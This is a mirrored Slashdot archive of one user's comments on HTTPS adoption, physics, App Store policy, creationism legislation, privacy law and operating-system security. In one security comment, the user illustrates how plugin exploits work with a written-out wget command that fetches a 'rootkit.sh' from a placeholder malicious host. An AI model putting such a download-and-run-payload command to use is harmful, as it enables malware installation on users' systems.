Slashdot Mirror


User: LordLimecat

LordLimecat's activity in the archive.

Stories
0
Comments
10,208
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 10,208

  1. Re:Haven’t we been here before? on Why Doesn't Every Website Use HTTPS? · · Score: 1

    (Slashdot took out the colon in my address :( )

  2. Re:Haven’t we been here before? on Why Doesn't Every Website Use HTTPS? · · Score: 1

    Also, NAT has been around for what, 20 years? Just tell the world that your address is https://www.twitter.com19283/ after a while people will remember it.

  3. Re:Haven’t we been here before? on Why Doesn't Every Website Use HTTPS? · · Score: 1

    Then go to your local starbucks, fire up firesheep, and start raking in the cash off of amazon.

    PROTIP: It doesnt work like that anymore. On pretty much every big site, once you log in, the remainder of the session is SSL; that doesnt mean that traffic prior to login needs to be encrypted. How often do you think people check amazon just for pricing without making a purchase? Should Amazon increase their capacity by 20% just so that people have encrypted browsing sessions? Would you be willing to pay a 20% increase on all of their products to finance it?

  4. Re:Physicists on Was the Early Universe 2 Dimensional Spacetime? · · Score: 1

    Particles as we understand them exist in 3 dimensions, however; it seems kind of silly to take concepts as defined in 3 dimensions and then apply the terms to a 1 dimensional hypothetical universe.

  5. Re:Physicists on Was the Early Universe 2 Dimensional Spacetime? · · Score: 2, Interesting

    How does a concept of heat and energy even work when there is no possible motion (how do you have motion with only one dimension?)?

  6. Re:And there's the problem with a "curated" appsto on Apple's App Store Accepts 'Gay Cure' App · · Score: 1

    Starting to block apps because of a point of view espoused therein wont go WORSE for them?

    Lets put it this way, if a different author had spun it different, "Apple likely to block app because of Author belief", you dont think 80% of slashdot would be crying for a lynching?

  7. Re:Free speech on Apple's App Store Accepts 'Gay Cure' App · · Score: 3, Insightful

    Blocking stuff based on a maturity rating is a heck of a lot different than blocking stuff based n whether you agree with it or not.

    I suppose the FCC might as well start blocking shows that it finds "subversive"?

  8. Re:There really is an app for everything :P on Apple's App Store Accepts 'Gay Cure' App · · Score: 1

    Isn't it also a form of lying to know that you're homosexual deep inside but try to pose as a heterosexual person, both to yourself and possible partners and outside society

    The assumption is that you arent "a homosexual deep inside" in any way that could ever be testably shown (for instance, we know it is not "simply genetic").

    Heres a shocker-- noone can thoroughly explain what makes someone homosexual, and thus people tend to disagree on whether its innate or not.

  9. Re:No objectionable material? on Apple's App Store Accepts 'Gay Cure' App · · Score: 2

    Would you say that the first amendment is a good thing, so long as the only things that are allowed to be expressed are those you agree with?

    If you condemn folks for having a religious view on homosexuality, you brand yourself a hypocrite-- you would force your own views on others in the name of promoting free speech.

  10. Re:No No No !!!!! It will be BARELY noticable on See The Supermoon Tonight · · Score: 1

    I will say that I noticed the moon looked exceptionally bright last night at around 11pm, when it was overhead, even if the supermoon thing isnt noticable (hadnt heard about it till now).

    Could there have been any particular reason for that, or would it just have been because it was an exceptionally clear night?

  11. Re:Republicans = Hypocrites, again on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    Thinking that YOUR parties politicians are morally superior to the opposition's may be the height of delusion. Theyre all men, and they all have their failings. It is constructive to discuss the results of Democrat or Republican policy, or the merits of their positions; it becomes a waste of time when you stoop to pointing the finger at the failings of individuals in the respective parties as representative of the whole.

  12. Re:Republicans = Hypocrites, again on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    because no one on the right paints everyone on the left as if they had the same beliefs as the most loony tunes lefty idiot

    Are you attempting to justify a wrong by claiming that others commit them, too?

    The conversation isnt about how many people spout off half-truths and unfair allegations; my point was that people like you should refrain from doing so unless you want to brand yourself as being unable to have a rational conversation about politics with someone.

  13. Re:Republicans = Hypocrites, again on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    You didnt use it as an example; you stated it as the basis for your assertion that republicans are hypocrites.

    Is it OK if I launch into a rant about Democrats are hypocrites because of all the things Obama has said and (not) done? Or would that be unfair, painting all democrats with the same brush as Obama?

  14. Re:Good idea on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    Yours may be the most on target and lucid response in this thread; thank you for keeping a level head and responding rationally and civilly.

  15. Re:Good idea on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    Gravity is a theory because it is quite impossible to prove that it operates in the same way at all points in the universe. We can gather evidence on that, but no more; and anyone who says "theres no more need to remember the evidence, the case is closed" has forgotten the entire basis of scientific study.

  16. Re:Good idea on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    That it does in fact happen has been repeatedly observed and exhaustively proven.

    I would hazard that it is quite impossible to definitively prove that evolution, or any other specific event, happened in the past.

    If you argue THAT, then you dont understand the meaning of either the word definitively, or the word prove.

  17. Re:Microsoft helps the internet on Microsoft Conducts Massive Botnet Takedown Action · · Score: 1

    er, that exploit would probably be more successful if i had actually included the command to launch it, instead of chmoding and deleting it....

    I wouldnt make a very good malware author, I suck at reviewing my work :(

  18. Re:Microsoft helps the internet on Microsoft Conducts Massive Botnet Takedown Action · · Score: 1

    Um, Windows has something similar; no downloaded executable content can be run until it is either marked "unblock", or the user confirms that they want to run it.

    Trouble is, these exploits often enough dont just download an exe and run it; they launch already-present code to fetch more bits of the rootkit. For example, adobe flash exploit is executed; the exploit launches 'wget hxxp://nastysite.ru/rootkit.sh && chmod u+x ~/Downloads/rootkit.sh && rm -f ~/Downloads/rootkit.sh'.

    Guess what: that "no-execute by default" isnt there to mitigate flash exploits, nor does it. Its there to prevent users from downloading binaries and running them willy-nilly, on the (probably correct) assumption that non-techie users should use Add/Remove or Synaptic 99% of the time.

  19. Re:Microsoft helps the internet on Microsoft Conducts Massive Botnet Takedown Action · · Score: 1

    Clicking yes isnt the problem. If a virus is prompting you to do things, most malware authors will not release it. The good ones you see in the wild exploit browser plugins and then check their permissions-- if they are admin, they rootkit, of they are a normal user they install userland junk. No UAC prompt is ever triggered, nor is there a "are you sure you want to run" box-- the code is already running.

    All this armchair discussion on how to fix the virus issue is wonderful, but one suspects that most people here talking about how viruses work dont actually get paid to remove them, and so have no clue how they operate.

  20. Re:Microsoft helps the internet on Microsoft Conducts Massive Botnet Takedown Action · · Score: 1

    The attacks generally arrive through Java, or Flash, or PDF, and are in many ways browser and OS agnostic; they simply have to be tweaked to run on a different OS. The only thing saving you in that CLI scenario is the fact that Lynx doesnt have a PDF or flash plugin.

  21. Re:Microsoft helps the internet on Microsoft Conducts Massive Botnet Takedown Action · · Score: 3, Informative

    OS insecurity has very little to do with it. Make 'rootkit_and_sendspam.sh' and run it from a Linux box, it will work just as well. Whats that, gksu will prompt you if you really want to do that? IIRC Vista and seven do as well, and if people actually followed Microsoft's best practices for XP, youd get a runas prompt on that as well.

    In 5 years, the story will be about Apple viruses; that doesnt mean Unix is insecure (though it may indeed be because of Adobe flaws).

  22. Re:Good idea on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 1

    It does, however, in this case correctly indicate that it has not been exhaustively proven, and anyone who says otherwise is more ignorant of science than those they would malign.

  23. Re:Republicans = Hypocrites, again on Texas Bill Outlaws Discrimination Against Creationists In Academia · · Score: 5, Insightful

    I dont think you know what affirmative action is, and calling an entire party "hypocrites" based on one man's opinions is quite absurd.

  24. Re:Google's Troubles on Obama Calls For New Privacy Bill of Rights · · Score: 1

    We already HAVE laws about this, isnt that why privacy policies are listed? Now you want more laws because people couldnt be bothered enough to read the privacy policies, and you think it will do .... what exactly? Pop up ANOTHER box that people wont read because they DONT CARE?

    Look, if people are really concerned about this, it isnt hard: 3 clicks in ANY browser out there-- and 0 in Lynx, it asks by default-- and you will never be bothered by cookies again. This is not a problem that needs to be solved by legislation; if people care, they can fix it with the most trivial of efforts.

  25. Re:"Most" doesn't mean "very". on Microsoft On List of Most Ethical Companies · · Score: 1

    You mean like the gpg signing not just kernel but all rpms have had as default for many years now?

    Signing RPMs isnt the same as the kernel requiring a cryptographic signature to update. It is more similar to signing windows updates, which AFAIK has been the case for basically forever. Windows installers also can be cryptographically signed, but unless I am mistaken neither Windows nor Linux requires an executable to be signed in order to run-- though in Windows it is indeed possible to enforce such things with GPOs.
    Such signatures may help against inadvertant compromise through tampering with repositories; but they dont really help mitigate damage from secondary attack vectors (such as Flash exploits combined with escalation exploits), which is the entire point of PatchGuard.

    And while buffer overwrite attacks are certainly not unknown in linux, good programming practices in C plus many eyes on the source code make them way less common, especially in privileged code, in linux.

    Im not trying to put linux down here; I use it in a number of areas. However you are deluded if you think there are no closed source binary blobs with their own vulnerabilities. Imagine for a moment that Linux on the Desktop hits it big in enterprise; do you suppose for a moment that PHBs wont demand the official binary-blob Adobe Reader, and the official (non-crappy gnash) Flash player? Good luck auditing THOSE.

    And when they occur, they get patched almost instantly, often within a matter of hours of when they are first announced, and with either yum or apt are often distributed to the entire universe of installed linux systems within 24 hours of the announcement.

    Which is in fact usually (though not always as you imply) true; yet it is NOT "security" as much as it is "mitigation", which is what I thought we were discussing.

    but it was announced that XP was going to be the "secure Windows" too, and look how that turned out. Better, sure. Secure? Please.

    XP SP2 +IE8 is actually pretty close down that route. There are a few exploits that can compromise such a setup, but in 90% of the cases, viruses sneak in with or without admin priveleges through an Adobe browser plugin vulnerability. It is silly to judge MS's security for that, when pretty much ALL platforms are affected equally-- Last I checked, most people use the official Flash binary whether on Mac or WIndows or Linux, and such exploits could just as easily be crafted to launch Linux shellcode if there were sufficient monetary incentive. And its no use bleating about sudo and least privelege; such shellcode could install a userland rootkit which could go unnoticed for weeks, no root needed.

    So I'm forced to judge Microsoft on the basis of a mixed personal irritation and laziness and cost index amortized over decades

    And you are free to do so. Picking a software solution depends in part on past performance. However, to judge a particular product solely on the basis of prior products from the same vendor, with no testing or firsthand experience, or even (it would seem) research, is a little bit irresponsible. Windows today is not what it was in the past, and Microsoft makes some rather impressive software these days (in SOME categories, it must be stressed). Server 2008 is an impressive piece of work, and Exchange 2010 moreso, and I am grudgingly impressed with IE9 to boot (though I still prefer Chrome, as it actually works on Linux and tends to smoke IE).

    Honestly, either try the products (thats what VMs are for), or stop railing about how bad they are.